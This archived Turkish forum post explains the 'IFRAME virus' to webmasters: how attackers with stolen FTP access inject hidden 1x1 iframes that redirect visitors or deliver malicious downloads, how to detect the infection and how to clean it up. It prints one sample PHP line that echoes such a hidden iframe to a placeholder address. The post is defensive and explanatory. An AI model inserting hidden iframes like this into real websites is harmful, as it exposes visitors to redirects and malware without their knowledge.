MyBB Depo Forum

Orjinalini görmek için tıklayınız: IFRAME Virüsü Nedir ? Nasıl Bulaşır ve Nasıl Temizlenir ?
Şu anda (Arşiv) modunu görüntülemektesiniz. Orjinal Sürümü Görüntüle internal link
resim

Son zamanlarda Web site sahiplerinin korkulu rüyası olan IFRAME virüsü gün geçtikçe daha da yaygın hale gelmeye başladı. Bu konumuzda bu virüsten muzdarip olan webmasterlar için yol gösterici olacak bir yazı hazırladık.


IFRAME Virüsü Nedir ?


Bu sorunu çözebilmek için ilk başta, bu virüsün ne olduğunu tam olarak kavramakta büyük fayda var. IFRAME virüsü, web sitenize ftp aracılığıyla eklenen ve sitenizin herhangi bir noktasına 1x1px boyutlarında bir kod ekleyerek, sitenizden yönlendirme yapıp, sitenize gelen ziyaretçilerin bu zararlı kod içerisinde belirtilen siteye gitmesine, bu sayede istenilen sitenin hit kazanmasına ve sizin sitenizin de hit kaybetmesine hatta, Google tarafından sandbox’a alınıp, aramalarda düşüş yaşamanıza sebep olabilir.

Birde işin diğer boyutu var tabi ki bu virüs sayesinde, yine sitenize eklenen kod içerisinde indirme linki verilerek, siteniz üzerinden zararlı kod indirilmesine yol açıyor ve böylelikle google tarafından zararlı site olarak fişleniyorsunuz. Ayrıca düzenli ziyaretçiye sahip olan sitelerde, ziyaretçilerin sitede ki zararlı kodlardan dolayı, siteye girmemesine, bundan dolayı da ziyaretçi sayısında düşüş yaşamanıza sebep olabiliyor.

İFRAME VİRÜSÜ NASIL ANLAŞILIR ?

Sitenize girdiğinizde herhangi bir yönlendirme yapılıyor veya zararlı kod indiriliyorsa virüs bulaşmış olma ihtimali yüksektir. Bilginiz olması ve virüsü daha kolay temizleme açısından sizlere örnek bir Php IFRAME kod örneği gösterelim.

Kod:
echo “<iframe src=”http://siteadresi123″ width=1 height=1

    style=”visibility:hidden;position:absolute”></iframe>”;

Bu şekilde kullanılan kod sayesinde, yukarıda da belirttiğim gibi herhangi bir sayfaya 1×1 px boyutlarında bu kod ekleniyor, sitenizden yönlendirme veya indirme yapılması isteniyor olabilir.


IFRAME Virüsü Nasıl Temizlenir ?


Virüsün sitenize girebilmesi için iki yol var. Bilgisayarınıza bulaşıp buradan sızmış olabilir yada direk FTP’ye bulaşarak sitenize sızmış olabilir. Bilgisayarınıza bulaşmış olma ihtimalini göz önünde bulundurarak, Bilgisayarınızda antivirüs programları aracılığıyla temizleme işlemi yapabilirsiniz. Eğer virüs direkt olarak FTP’ye bulaşmış ise, temizlenmesi konusunda titiz davranmanız gerekmektedir. İlk önce FTP programınızda kesinlikle otomatik açılış yapmayın, şifrelerinizi kaydetmeyin. Virüsü bulaştıran saldırgan, şifre ve bilgilerinize ulaştığından dolayı, eğer siz tamamen temizlemez ve şifrelerinizi yenilemez iseniz tekrar aynı sorun ile karşılaşma ihtimaliniz yüksek olacaktır. Bunun dışında crackli FTP programları kullanmak bu konuda büyük bir tehlike arz eder, bunun yerine ücretsiz dağıtımı yapılan programları tercih etmenizde fayda var. Bu konuda FileZilla programını öneririm.


IFRAME VİRÜSÜ TEMİZLENDİKTEN SONRA NELER YAPILMALI ?


Yukarı da belirttiğim gibi virüs sitenize bulaştıktan sonra, Google tarafından cezalandırılmış olma ihtimali yüksek. Sitenize girdiğinizde zararlı site uyarısı verebilir. Tamamen temizlendiğine emin olduktan sonra, Google Webmaster Tools kullanarak, sitenizin temizlendiğini ve tekrar değerlendirilmesini istediğinizi belirtebilir, eski günlerinize dönmeniz için adım atabilirsiniz.


Kaynak ; http://frmcry.co.cc/konu-sabit-iframe-vi...lenir.html